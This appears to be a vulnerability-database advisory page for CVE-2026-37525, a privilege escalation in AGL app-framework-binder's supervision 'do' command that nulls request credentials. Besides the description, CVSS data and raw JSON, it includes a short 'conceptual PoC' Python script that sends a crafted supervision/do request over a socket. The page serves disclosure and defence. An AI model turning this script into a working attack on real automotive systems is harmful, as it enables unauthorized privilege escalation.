Security Vulnerability Report
中文
CVE-2026-37525 CVSS 7.8 HIGH

CVE-2026-37525

Published: 2026-05-01 17:16:22
Last Modified: 2026-05-07 15:15:56
Source: [email protected]

Description

AGL app-framework-binder (afb-daemon) through v19.90.0 contains a privilege escalation vulnerability in the supervision Do command. The on_supervision_call function in src/afb-supervision.c explicitly nullifies the request credentials by calling afb_context_change_cred(&xreq->context, NULL) before dispatching an attacker-controlled API call via xapi->itf->call(xapi->closure, xreq). The NULL propagation chain through afb-context.c:110 (context->credentials = afb_cred_addref(NULL)) and afb-cred.c:163 (returns NULL when cred is NULL) confirms that credentials are zeroed before the target API executes. The attacker controls both api and verb parameters via JSON input, allowing execution of any registered API with a NULL credential context. APIs that rely on context->credentials for authorization decisions may fail open when receiving NULL credentials, enabling privilege escalation. This vulnerability was introduced in commit abbb4599f0b921c6f434b6bd02bcfb277eecf745 on 2018-02-14.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

AGL app-framework-binder (afb-daemon) <= v19.90.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Conceptual PoC for CVE-2026-37525 # This PoC demonstrates sending a crafted supervision request # to trigger the credential nullification issue. import socket import json def exploit_poc(host, port): # Targeting the vulnerable supervision/do endpoint # The 'api' and 'verb' fields are controlled by the attacker payload = { "id": 1, "request": "supervision/do", "api": "privileged_api", # Attacker controlled target API "verb": "sensitive_action" # Attacker controlled verb } try: print(f"[*] Connecting to {host}:{port}...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) # Serialize payload and send message = json.dumps(payload) + "\n" s.send(message.encode('utf-8')) print(f"[*] Sent payload: {message.strip()}") # Receive response response = s.recv(1024) print(f"[+] Server response: {response.decode('utf-8')}") except Exception as e: print(f"[-] Exploit failed: {e}") finally: s.close() if __name__ == "__main__": TARGET_IP = "127.0.0.1" TARGET_PORT = 1234 # Default port for AFB binding exploit_poc(TARGET_IP, TARGET_PORT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-37525", "sourceIdentifier": "[email protected]", "published": "2026-05-01T17:16:22.270", "lastModified": "2026-05-07T15:15:55.993", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "AGL app-framework-binder (afb-daemon) through v19.90.0 contains a privilege escalation vulnerability in the supervision Do command. The on_supervision_call function in src/afb-supervision.c explicitly nullifies the request credentials by calling afb_context_change_cred(&xreq->context, NULL) before dispatching an attacker-controlled API call via xapi->itf->call(xapi->closure, xreq). The NULL propagation chain through afb-context.c:110 (context->credentials = afb_cred_addref(NULL)) and afb-cred.c:163 (returns NULL when cred is NULL) confirms that credentials are zeroed before the target API executes. The attacker controls both api and verb parameters via JSON input, allowing execution of any registered API with a NULL credential context. APIs that rely on context->credentials for authorization decisions may fail open when receiving NULL credentials, enabling privilege escalation. This vulnerability was introduced in commit abbb4599f0b921c6f434b6bd02bcfb277eecf745 on 2018-02-14."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://gerrit.automotivelinux.org/gerrit/src/app-framework-binder", "source": "[email protected]"}, {"url": "https://gist.github.com/sgInnora/8526eedcfd826d05ef1fc45d8f405643", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.